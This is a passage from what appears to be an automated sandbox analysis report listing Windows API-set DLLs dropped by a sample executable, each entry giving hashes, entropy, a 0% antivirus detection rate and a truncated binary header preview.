Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...4..\|...........!......................... ...............................0......t.....@.......................................... ..................8=..............T............................................................................text...}........................... ..`.rsrc........ ......................@..@....4..\|........8...T...T.......4..\|........d...............4..\|....................RSDS.=.Co.P..Gd./%P....api-ms-win-core-file-l2-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........4..\|........................D...p...............#...P...................;...g...................<...m...............%...Z.........................api-ms-win-core-file-l2-1-0.dll.CopyFile2.kernel32.CopyFile2.CopyFileExW.kernel32.CopyFileExW.Crea

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-handle-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.1117101479630005
Encrypted:	false
SSDEEP:	384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
MD5:	6DB54065B33861967B491DD1C8FD8595
SHA1:	ED0938BBC0E2A863859AAD64606B8FC4C69B810A
SHA-256:	945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
SHA-512:	AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....G...........!......................... ...............................0......V.....@............................._............ ..................8=..............T............................................................................text..._........................... ..`.rsrc........ ......................@..@......G........:...T...T.........G........d.................G....................RSDSQ..{...IS].0.> ....api-ms-win-core-handle-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg......._....edata... ..`....rsrc$01....` .......rsrc$02......................G....Z...............(...<...P...................A...\|...............,.............api-ms-win-core-handle-l1-1-0.dll.CloseHandle.kernel32.CloseHandle.CompareObjectHandles.kernel32.CompareObjectHandles.DuplicateHandle.kernel32

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-heap-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.174986589968396
Encrypted:	false
SSDEEP:	192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
MD5:	2EA3901D7B50BF6071EC8732371B821C
SHA1:	E7BE926F0F7D842271F7EDC7A4989544F4477DA7
SHA-256:	44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
SHA-512:	6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....:............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......:.........8...T...T.........:.........d.................:.....................RSDS.K....OB;....X......api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02..........:.........................X...............2...Q...q.......................C...h...........................(...E...f.......................0..._...z...............................................api-ms-win-core-heap-l1-1-0.dll.GetProcessHeap.k

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-interlocked-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17856
Entropy (8bit):	7.076803035880586
Encrypted:	false
SSDEEP:	192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
MD5:	D97A1CB141C6806F0101A5ED2673A63D
SHA1:	D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
SHA-256:	DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
SHA-512:	0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....$.............!......................... ...............................0...........@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$..........?...T...T........$..........d................$......................RSDS#.......,.S.6.~j....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.................$......................(...T...............L...............!...U...................1.......p...............@...s.................................api-ms-win-core-interlocked-l1-1-0.dll.InitializeSListHead.kernel32.InitializeSLis

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-libraryloader-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.131154779640255
Encrypted:	false
SSDEEP:	384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
MD5:	D0873E21721D04E20B6FFB038ACCF2F1
SHA1:	9E39E505D80D67B347B19A349A1532746C1F7F88
SHA-256:	BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
SHA-512:	4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....ul...........!......................... ...............................0......9.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....ul........A...T...T........ul........d................ul....................RSDSU..e.j.(.wD.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............ul....................(...p...........R...}..................Y...................8..._.......................B...k...................F...u...............)...P...w...................................................api-ms-win-c

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-localization-l1-2-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20792
Entropy (8bit):	7.089032314841867
Encrypted:	false
SSDEEP:	384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
MD5:	EFF11130BFE0D9C90C0026BF2FB219AE
SHA1:	CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
SHA-256:	03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
SHA-512:	8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...S.v............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....S.v.........@...T...T.......S.v.........d...............S.v.....................RSDS..pS...Z4Yr.E@......api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................S.v.....v.......;...;...(.......................<...f.......................5...]...................!...I...q...................N.............../...j.............../...^.................../...\...................8...`...........

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-memory-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.101895292899441
Encrypted:	false
SSDEEP:	384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
MD5:	D500D9E24F33933956DF0E26F087FD91
SHA1:	6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
SHA-256:	BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
SHA-512:	C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....%(...........!......................... ...............................0............@.............................l............ ..................8=..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......%(........:...T...T.........%(........d.................%(....................RSDS.~....%.T.....CO....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......l....edata... ..`....rsrc$01....` .......rsrc$02......................%(....................(...h...........)...P...w...................C...g...................%...P...........B...g...................4...[...\|...................=...................................api-ms-win-core-memory-l1-1-0.dl

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-namedpipe-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.16337963516533
Encrypted:	false
SSDEEP:	192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
MD5:	6F6796D1278670CCE6E2D85199623E27
SHA1:	8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
SHA-256:	C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
SHA-512:	6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L... ..............!......................... ...............................0.......-....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.... ...........=...T...T....... ...........d............... .......................RSDS...IK..XM.&......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................ .......................(...P...x...............:...w...............O...y...............&...W...............=...j.......................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel32.ConnectNamedPipe.CreateNamedP

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processenvironment-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19248
Entropy (8bit):	7.073730829887072
Encrypted:	false
SSDEEP:	192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
MD5:	5F73A814936C8E7E4A2DFD68876143C8
SHA1:	D960016C4F553E461AFB5B06B039A15D2E76135E
SHA-256:	96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
SHA-512:	77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...).r............!......................... ...............................0.......:....@.............................G............ ..................0=..............T............................................................................text...G........................... ..`.rsrc........ ......................@..@....).r.........F...T...T.......).r.........d...............).r.....................RSDS.6..~x.......'......api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......G....edata... ..`....rsrc$01....` .......rsrc$02........).r.....................(...\|.......B...............$...M...{...............P...................6...k.............../...(...e...............=...f...............8...q...............!...T............... ...........................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19392
Entropy (8bit):	7.082421046253008
Encrypted:	false
SSDEEP:	384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
MD5:	A2D7D7711F9C0E3E065B2929FF342666
SHA1:	A17B1F36E73B82EF9BFB831058F187535A550EB8
SHA-256:	9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
SHA-512:	D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......l.....@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@................B...T...T...................d.......................................RSDS..t........=j.......api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................1...1...(...........K...x...............,...`...................C...q...............'...N...y..............."...I...{...............B...p...............,...c...............H...x...................9...S...p.......

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-1.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.1156948849491055
Encrypted:	false
SSDEEP:	384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
MD5:	D0289835D97D103BAD0DD7B9637538A1
SHA1:	8CEEBE1E9ABB0044808122557DE8AAB28AD14575
SHA-256:	91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
SHA-512:	97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....9.............!......................... ...............................0......k.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....9..........B...T...T........9..........d................9......................RSDS&.n....5..l....)....api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............9......................(...`...........-...l..........."...W...................N...................P...............F...q...............3...r...................................api-ms-win-core-processthreads-l1-1-1.dll.FlushInstr

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-profile-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17712
Entropy (8bit):	7.187691342157284
Encrypted:	false
SSDEEP:	192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
MD5:	FEE0926AA1BF00F2BEC9DA5DB7B2DE56
SHA1:	F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
SHA-256:	8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
SHA-512:	0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....&............!......................... ...............................0......0.....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....&.........;...T...T........&.........d................&.....................RSDS...O.""#.n....D:....api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................&.....<...............(...0...8...w......._...........api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerformanceFrequency....................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-rtlsupport-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17720
Entropy (8bit):	7.19694878324007
Encrypted:	false
SSDEEP:	384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
MD5:	FDBA0DB0A1652D86CD471EAA509E56EA
SHA1:	3197CB45787D47BAC80223E3E98851E48A122EFA
SHA-256:	2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
SHA-512:	E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......(...........!......................... ...............................0......}"....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......(........>...T...T..........(........d..................(....................RSDS?.L.N.o.....=.......api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................(....F...............(...4...@...~...........l.................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBackTrace.RtlUnwind.ntdll.RtlUnwind.

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-string-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.137724132900032
Encrypted:	false
SSDEEP:	384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
MD5:	12CC7D8017023EF04EBDD28EF9558305
SHA1:	F859A66009D1CAAE88BF36B569B63E1FBDAE9493
SHA-256:	7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
SHA-512:	F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....R............!......................... ...............................0.......\....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......R.........:...T...T.........R.........d.................R.....................RSDS..D..a..1.f....7....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02......................R.....x...............(...H...h...............)...O...x...........................>...i...........................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.CompareStringOrdinal.kernel32.Compare

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20280
Entropy (8bit):	7.04640581473745
Encrypted:	false
SSDEEP:	384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
MD5:	71AF7ED2A72267AAAD8564524903CFF6
SHA1:	8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
SHA-256:	5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
SHA-512:	7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......2...........!......................... ...............................0............@.............................V............ ..................8=..............T............................................................................text...V........................... ..`.rsrc........ ......................@..@.......2........9...T...T..........2........d..................2....................RSDS...z..C...+Q_.....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg.......V....edata... ..`....rsrc$01....` .......rsrc$02.......................2............)...)...(.......p.......1...c...................!...F...m...............$...X...........$...[.......................@...i...............!...Q.......................[...............7...........O...................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-2-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.138910839042951
Encrypted:	false
SSDEEP:	384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
MD5:	0D1AA99ED8069BA73CFD74B0FDDC7B3A
SHA1:	BA1F5384072DF8AF5743F81FD02C98773B5ED147
SHA-256:	30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
SHA-512:	6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...XuY...........!......................... ...............................0......3.....@.............................v............ ..................8=..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....XuY........9...T...T.......XuY........d...............XuY....................RSDS.V..B...`..S3.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg.......v....edata... ..`....rsrc$01....` .......rsrc$02....................X*uY....................(...l...........R...................W...............&...b...............$...W.......6...w...............;...\|...............H...................A.....................................api-ms-win-core-synch-

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-sysinfo-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19248
Entropy (8bit):	7.072555805949365
Encrypted:	false
SSDEEP:	384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
MD5:	19A40AF040BD7ADD901AA967600259D9
SHA1:	05B6322979B0B67526AE5CD6E820596CBE7393E4
SHA-256:	4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
SHA-512:	5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#\|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-timezone-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18224
Entropy (8bit):	7.17450177544266
Encrypted:	false
SSDEEP:	384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
MD5:	BABF80608FD68A09656871EC8597296C
SHA1:	33952578924B0376CA4AE6A10B8D4ED749D10688
SHA-256:	24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
SHA-512:	3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....Y.x...........!......................... ...............................0......}3....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....Y.x........<...T...T........Y.x........d................Y.x....................RSDS.^.b. .t.H.a.......api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................Y.x....................(...L...p...........5...s...........+...i...................U...............I.........................api-ms-win-core-timezone-l1-1-0.dll.FileTimeToSystemTime.kernel32.FileTimeToSystemTime.GetDynamicTimeZ

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-util-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.1007227686954275
Encrypted:	false
SSDEEP:	192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
MD5:	0F079489ABD2B16751CEB7447512A70D
SHA1:	679DD712ED1C46FBD9BC8615598DA585D94D5D87
SHA-256:	F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
SHA-512:	92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....f............!......................... ...............................0......`k....@.............................9............ ..................8=..............T............................................................................text...)........................... ..`.rsrc........ ......................@..@......f.........8...T...T.........f.........d.................f.....................RSDS*...$.L.Rm..l.....api-ms-win-core-util-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg.......9....edata... ..`....rsrc$01....` .......rsrc$02..........f.....J...................,...@...o...................j...}.........................api-ms-win-core-util-l1-1-0.dll.Beep.kernel32.Beep.DecodePointer.kernel32.DecodePointer.DecodeSystemPointer.kernel32.DecodeSystemPointer.EncodePointer.kernel3

C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-conio-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19256
Entropy (8bit):	7.088693688879585
Encrypted:	false
SSDEEP:	384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
MD5:	6EA692F862BDEB446E649E4B2893E36F
SHA1:	84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
SHA-256:	9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
SHA-512:	9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
Malicious:	false
